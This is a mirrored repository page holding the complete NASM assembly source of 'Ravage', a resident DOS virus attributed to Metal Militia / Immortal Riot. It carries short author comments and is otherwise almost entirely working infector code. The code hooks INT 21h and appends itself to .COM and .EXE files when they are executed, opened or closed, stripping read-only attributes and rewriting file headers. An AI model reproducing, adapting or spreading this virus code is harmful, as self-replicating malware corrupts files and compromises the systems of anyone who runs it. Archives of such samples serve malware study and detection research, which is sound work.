mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
254 lines
5.8 KiB
NASM
254 lines
5.8 KiB
NASM
|
; Virusname: Ravage
|
||
|
; Origin: Sweden
|
||
|
; Author: Metal Militia
|
||
|
|
||
|
; This virus can be found with any anti-virus program, since it's been
|
||
|
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON, that is..)
|
||
|
|
||
|
; It's a resident .COM and .EXE infector, without any encryption or
|
||
|
; stealth capabilities. It infects when you execute (4bh), opens (3dh),
|
||
|
; extended open (6ch), and on closing (3eh). This makes it quite a good
|
||
|
; infector, but since it doesn't care what files it infects, most of the
|
||
|
; AV programs will find themselves makes it quite a good infector, but
|
||
|
; any program with selfchecking (95%) will find themself hit.
|
||
|
|
||
|
; I stopped with this virus since it's so totally buggy that you'll find
|
||
|
; it almost at once. This is the reason why i give you the source code.
|
||
|
; In my later resident things, there will be such things as encryption,
|
||
|
; stealth etc. i think..
|
||
|
|
||
|
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
.radix 16
|
||
|
.code
|
||
|
EXE_ID = -42
|
||
|
viruslength = heap - _small
|
||
|
startload = 90 * 4
|
||
|
|
||
|
_small:
|
||
|
call relative
|
||
|
oldheader dw 020cdh
|
||
|
dw 0bh dup (0)
|
||
|
relative:
|
||
|
pop bp
|
||
|
push ds
|
||
|
push es
|
||
|
xor ax,ax
|
||
|
mov ds,ax
|
||
|
mov es,ax
|
||
|
mov di,startload
|
||
|
cmp word ptr ds:[di+25],di
|
||
|
jz exit_small
|
||
|
|
||
|
lea si,[bp-3]
|
||
|
mov cx,viruslength
|
||
|
db 2Eh
|
||
|
rep movsb
|
||
|
|
||
|
mov di,offset old21 + startload
|
||
|
mov si,21*4
|
||
|
push si
|
||
|
movsw
|
||
|
movsw
|
||
|
pop di
|
||
|
mov ax,offset int21 + startload
|
||
|
stosw
|
||
|
xchg ax,cx
|
||
|
stosw
|
||
|
|
||
|
exit_small:
|
||
|
pop es
|
||
|
pop ds
|
||
|
|
||
|
or sp,sp
|
||
|
jnp returnCOM
|
||
|
returnEXE:
|
||
|
mov ax,ds
|
||
|
add ax,10
|
||
|
add [bp+16],ax
|
||
|
add ax,[bp+0e]
|
||
|
mov ss,ax
|
||
|
mov sp,cs:[bp+10]
|
||
|
jmp dword ptr cs:[bp+14]
|
||
|
returnCOM:
|
||
|
mov di,100
|
||
|
push di
|
||
|
mov si,bp
|
||
|
movsw
|
||
|
movsb
|
||
|
ret
|
||
|
|
||
|
infect:
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push si
|
||
|
push di
|
||
|
push ds
|
||
|
push es
|
||
|
|
||
|
mov ax,4300h
|
||
|
int 21h
|
||
|
jnc test_it
|
||
|
jmp exitinfect
|
||
|
|
||
|
test_it:
|
||
|
test cl,1
|
||
|
je ok_2_open
|
||
|
and cl,0feh
|
||
|
mov ax,4301h
|
||
|
int 21h
|
||
|
jnc ok_2_open
|
||
|
jmp exitinfect
|
||
|
|
||
|
ok_2_open:
|
||
|
mov ax,3d02
|
||
|
int 21
|
||
|
xchg ax,bx
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
push cs
|
||
|
pop es
|
||
|
|
||
|
mov ax,5700h
|
||
|
int 21h
|
||
|
|
||
|
push cx
|
||
|
push dx
|
||
|
|
||
|
mov si,offset oldheader+startload
|
||
|
|
||
|
mov ah,3f
|
||
|
mov cx,18
|
||
|
push cx
|
||
|
mov dx,si
|
||
|
int 21
|
||
|
|
||
|
cmp ax,cx
|
||
|
jnz go_already_infected
|
||
|
|
||
|
mov di,offset target + startload
|
||
|
push di
|
||
|
rep movsb
|
||
|
pop di
|
||
|
|
||
|
mov ax,4202
|
||
|
cwd
|
||
|
int 21
|
||
|
|
||
|
cmp ds:[di],'ZM'
|
||
|
jz infectEXE
|
||
|
cmp ds:[di],'MZ'
|
||
|
jz infectEXE
|
||
|
|
||
|
sub ax,3
|
||
|
mov byte ptr ds:[di],0e9
|
||
|
mov ds:[di+1],ax
|
||
|
|
||
|
sub ax,viruslength
|
||
|
cmp ds:[si-17],ax
|
||
|
jnz finishinfect
|
||
|
go_already_infected:
|
||
|
pop cx
|
||
|
jmp short already_infected
|
||
|
|
||
|
int21:
|
||
|
cmp ax,4b00
|
||
|
jz infect
|
||
|
cmp ax,3d00
|
||
|
jz infect
|
||
|
cmp ax,3e00
|
||
|
jz some_open
|
||
|
cmp ax,6c00
|
||
|
jnz not_opening
|
||
|
some_open:
|
||
|
mov ah,45
|
||
|
int 21
|
||
|
jmp infect
|
||
|
|
||
|
not_opening:
|
||
|
jmp chain
|
||
|
|
||
|
infectEXE:
|
||
|
cmp word ptr [di+10],EXE_ID
|
||
|
jz go_already_infected
|
||
|
|
||
|
push ax
|
||
|
push dx
|
||
|
|
||
|
add ax,viruslength
|
||
|
adc dx,0
|
||
|
|
||
|
mov cx,200
|
||
|
div cx
|
||
|
|
||
|
or dx,dx
|
||
|
jz nohiccup
|
||
|
inc ax
|
||
|
nohiccup:
|
||
|
mov word ptr ds:[di+4],ax
|
||
|
mov word ptr ds:[di+2],dx
|
||
|
|
||
|
pop dx
|
||
|
pop ax
|
||
|
|
||
|
mov cx,10
|
||
|
div cx
|
||
|
|
||
|
sub ax,ds:[di+8]
|
||
|
|
||
|
mov word ptr ds:[di+14],dx
|
||
|
mov word ptr ds:[di+16],ax
|
||
|
|
||
|
mov word ptr ds:[di+0e],ax
|
||
|
mov word ptr ds:[di+10],EXE_ID
|
||
|
finishinfect:
|
||
|
mov cx,viruslength
|
||
|
mov ah,40
|
||
|
mov dx,startload
|
||
|
int 21
|
||
|
|
||
|
mov ax,4200
|
||
|
xor cx,cx
|
||
|
cwd
|
||
|
int 21
|
||
|
|
||
|
mov ah,40
|
||
|
mov dx,di
|
||
|
pop cx
|
||
|
int 21
|
||
|
already_infected:
|
||
|
pop dx
|
||
|
pop cx
|
||
|
|
||
|
mov ax,5701h
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3e
|
||
|
int 21
|
||
|
jmp exitinfect
|
||
|
|
||
|
db 'RAVAGE! '
|
||
|
db '(c) Metal Militia / Immortal Riot'
|
||
|
|
||
|
exitinfect:
|
||
|
pop es
|
||
|
pop ds
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
chain:
|
||
|
db 0ea
|
||
|
heap:
|
||
|
old21 dw ?, ?
|
||
|
target dw 0ch dup (?)
|
||
|
|
||
|
endheap:
|
||
|
end _small
|